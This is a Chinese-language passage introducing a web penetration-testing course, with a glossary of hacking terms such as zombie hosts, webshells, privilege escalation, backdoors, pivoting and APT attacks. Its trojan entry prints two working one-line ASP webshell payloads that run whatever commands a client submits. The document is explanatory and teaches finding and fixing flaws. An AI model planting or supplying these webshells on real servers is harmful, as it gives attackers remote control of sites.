摘要:1. 文件上传(File upload):此漏洞允许攻击者在目标web服务器上上传可执行文件,课程将介绍如何防止利用这些漏洞来控制目标网站。本课程将带您从一个新手到一个更高级的水平——当你完成这套课以后,你将能够从黑帽黑客那里,对web站点和web应用进行安全测试,,不光是这些,你还能够解决这些漏洞并且对网站进行安全保护。

  • 1.1 一些前置知识(包含但不限于)
  • 脚本(asp、php、jsp)
  • html(css、js、html)
  • HTTP协议
  • CMS(B/S)
  • 1.2 肉鸡
  • 被黑客入侵并被长期驻扎的计算机或服务器。可以随意控制,可以是任意系统的设备,对象可以是企业,个人,政府等等所有单位。

你会学到什么是网站,它是如何工作的,它依赖什么,什么是网络服务器,数据库,以及所有这些组件如何协同工作给我们提供的功能。

一旦你了解了网站是如何工作的,我们就开始讨论如何利用这些组件和这种通讯方式来讨论黑客是如何进行攻击的。本课程将带您从一个新手到一个更高级的水平——当你完成这套课以后,你将能够从黑帽黑客那里,对web站点和web应用进行安全测试,,不光是这些,你还能够解决这些漏洞并且对网站进行安全保护。在这套课程中所解释的所有攻击都是针对我实验环境中的真实设备进行的。

本课程分为三个主要部分:

一. 信息收集-本节将教你如何收集你的目标网站的信息,你将学习如何发现使用的是哪个DNS服务器,网站服务器,子域名,未发布的目录,敏感文件,用户电子邮件,同一服务器上的网站,甚至是主机提供商。这一信息至关重要,因为它增加了成功访问目标网站的机会。

二. 漏洞的发现和修复–在这以部分,您将学习如何发现和修复大量的漏洞,这部分分为若干小节,每小节覆盖一个特定的漏洞,首先你会学到这是什么漏洞,这个漏洞能允许我们做什么,最后我们将看看什么样的代码导致这个漏洞,向你展示如何修复它和对网站进行安全防护,课程中覆盖以下漏洞:

1. 文件上传(File upload):此漏洞允许攻击者在目标web服务器上上传可执行文件,课程将介绍如何防止利用这些漏洞来控制目标网站。

2. 代码执行(Code Execution)——此漏洞允许用户在目标web服务器上运行系统代码,这可以用于执行恶意代码并获得反向shell访问,从而使攻击者完全控制目标web服务器。课程将介绍如何防止利用这个漏洞来执行恶意代码,防止获得反向连接来让攻击者完全控制目标web服务器。

3. 本地文件包含——这个漏洞可以用来阅读目标服务器上的任何文件,可以利用这一点阅读敏感文件,你将学习如何防止这种漏洞,防止得到反向连接,来避免让攻击者获得完全控制目标web服务器的权限。

  • 1.3 抓鸡
  • 利用使用量大的程序的漏洞,使用自动化方式获取肉鸡的行为。
  • 1.4 Webshell
  • 通过Web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制。
  • 1.5 漏洞
  • 硬件、软件、协议等等的可利用安全缺陷,可能被攻击者利用,对数据进行篡改,控制等。
  • 1.6 木马
  • 通过向服务端提交一句简短的代码,配合本地客户端实现webshell功能的木马。
  • <%eval request("pass")%>
  • <%execute(request("pass"))%>
  • request("pass")接收客户端提交的数据,pass为执行命令的参数值。
  • eval/execute 函数执行客户端命令的内容
  • 1.7 提权
  • 操作系统低权限的账户将自己提升为管理员权限使用的方法。
  • 1.8 后门
  • 黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个"入口"。
  • 1.9 跳板
  • 使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息。
  • 1.10 旁站入侵
  • 即同服务器下的网站入侵,入侵之后可以通过提权跨目录等手段拿到目标网站的权限。常见的旁站查询工具有:WebRobot、御剑、明小子和web在线查询等
  • 1.11 C段入侵
  • 即同C段下服务器入侵。如目标ip为192.168.180.253 入侵192.168.180.*的任意一台机器,然后利用一些黑客工具嗅探获取在网络上传输的各种信息。常用的工具有:在windows下有Cain,在UNIX环境下有Sniffit, Snoop, Tcpdump, Dsniff 等。
  • 1.12 黑盒测试
  • 在未授权的情况下,模拟黑客的攻击方法和思维方式,来评估计算机网络系统可能存在的安全风险。
  • 黑盒测试不同于黑客入侵,并不等于黑站。黑盒测试考验的是综合的能力(OS、Datebase、、code、思路、社工)。思路与经验积累往往决定成败。
  • 1.13 白盒测试
  • 相对黑盒测试,白盒测试基本是从内部发起。白盒测试与黑盒测试恰恰相反,测试者可以通过正常渠道向被测单位取得各种资料,包括网络拓扑、员工资料甚至网站或其它程序的代码片断,也能够与单位的其它员工(销售、程序员、管理者……)进行面对面的沟通。
  • 1.13 黑白盒的另一种说法
  • 知道源代码和不知道源代码的渗透测试。这时,黑盒测试还是传统的渗透测试,而白盒测试就偏向于代码审计。
  • 1.14 APT攻击
  • Advanced Persistent Threat,高级可持续性攻击,是指组织(特别是政府)或者小团体利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式。
  • 1.极强的隐蔽性
  • 2.潜伏期长,持续性强
  • 3.目标性强
  • 渗透测试相关资源
  • 实战类:
  • 实战微信银行渗透测试 展示安全评估思路、工具及经验
  • 某运营商渗透测试实战 展示渗透测试工具及业务系统中的常见问题
相关文章